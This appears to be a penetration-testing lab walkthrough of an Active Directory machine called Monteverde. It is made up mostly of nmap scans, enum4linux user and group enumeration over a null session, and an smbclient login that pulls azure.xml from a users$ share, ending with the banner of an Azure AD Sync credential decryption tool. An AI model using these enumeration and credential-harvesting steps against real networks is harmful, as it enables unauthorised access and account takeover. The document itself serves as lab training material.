$ sudo nmap -p- 10.10.10.172 -oA nmap_ports [sudo] password for noraj: Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-25 21:49 CET Nmap scan report for 10.10.10.172 Host is up (0.031s latency). Not shown: 65516 filtered ports PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49667/tcp open unknown 49673/tcp open unknown 49674/tcp open unknown 49675/tcp open unknown 49703/tcp open unknown 49775/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 123.83 seconds
And then did a service discovery and script scan with nmap again on open
ports.
$ sudo nmap -sSVC -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49703,49775 10.10.10.172 -oA nmap_services [sudo] password for noraj: Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-25 22:08 CET Stats: 0:04:26 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.34% done; ETC: 22:12 (0:00:01 remaining) Nmap scan report for 10.10.10.172 Host is up (0.031s latency).
PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-25 20:20:31Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49703/tcp open msrpc Microsoft Windows RPC 49775/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=3/25%Time=5E7BC858%P=x86_64-unknown-linux-gnu%r SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver SF:sion\x04bind\0\0\x10\0\x03"); Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 275.27 seconds
Let's see what we can find through SMB with CrackMapExec, enum4linux
and GetNPUsers.py from impacket.
============================================ | Nbtstat Information for 10.10.10.172 | ============================================ Looking up status of 10.10.10.172 No reply from 10.10.10.172
===================================== | Session Check on 10.10.10.172 | ===================================== [+] Server 10.10.10.172 allows sessions using username '', password '' [+] Got domain/workgroup name:
=========================================== | Getting domain SID for 10.10.10.172 | =========================================== Unable to initialize messaging context Domain Name: MEGABANK Domain Sid: S-1-5-21-391775091-850290835-3566037492 [+] Host is part of a domain (not a workgroup)
====================================== | OS information on 10.10.10.172 | ====================================== [+] Got OS info for 10.10.10.172 from smbclient: [+] Got OS info for 10.10.10.172 from srvinfo: Unable to initialize messaging context Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
========================================= | Share Enumeration on 10.10.10.172 | ========================================= Unable to initialize messaging context do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.172
==================================================== | Password Policy Information for 10.10.10.172 | ==================================================== [E] Unexpected error from polenum:
[+] Getting local group memberships: Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs
[+] Getting domain group memberships: Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
======================================================================= | Users on 10.10.10.172 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
============================================= | Getting printer info for 10.10.10.172 | ============================================= Unable to initialize messaging context Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
Let's find is there are valuable files in users$ share.
1 2 3 4 5 6 7 8 9 10
$ smbclient '\\10.10.10.172\users$' -U 'SABatchJobs' Unable to initialize messaging context Enter WORKGROUP\SABatchJobs's password: Try "help" to get a list of possible commands. smb: \> recuse on recuse: command not found smb: \> recurse on smb: \> prompt off smb: \> mget * getting file \mhope\azure.xml of size 1212 as azure.xml (4,8 KiloBytes/sec) (average 4,8 KiloBytes/sec)
====================== AZURE AD SYNC CREDENTIAL DECRYPTION TOOL Based on original code from: https://github.com/fox-it/adconnectdump ======================